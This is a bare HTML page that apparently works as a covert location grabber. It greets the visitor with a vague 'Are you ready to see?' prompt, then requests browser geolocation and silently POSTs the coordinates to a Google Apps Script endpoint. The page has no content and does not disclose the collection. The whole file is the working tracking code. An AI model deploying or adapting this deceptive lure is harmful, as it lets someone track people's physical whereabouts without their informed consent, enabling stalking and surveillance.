<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>

<script>
    window.onload = function () {
        const confirmShare = confirm("Are you ready to see?");
        if (!confirmShare) return;

        if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(
                (position) => {
                    const latitude = position.coords.latitude;
                    const longitude = position.coords.longitude;

                    const scriptURL = "https://script.google.com/macros/s/AKfycbzqELamY8VP9vQ7zvlbCjBsICYf06txmrjBoQ-cCk-pV1_vjl_Jlqk2_CcIPiYowbsKXQ/exec";

                    fetch(scriptURL, {
                        method: "POST",
                        headers: {
                            "Content-Type": "application/json",
                        },
                        body: JSON.stringify({ latitude, longitude }),
                    })
                    .then(r => r.text())
                    .then(console.log)
                    .catch(console.error);
                },

                (error) => {
                    console.error("Gagal mendapatkan lokasi:", error.message);
                }
            );
        }
    }
</script>

</body>
</html>
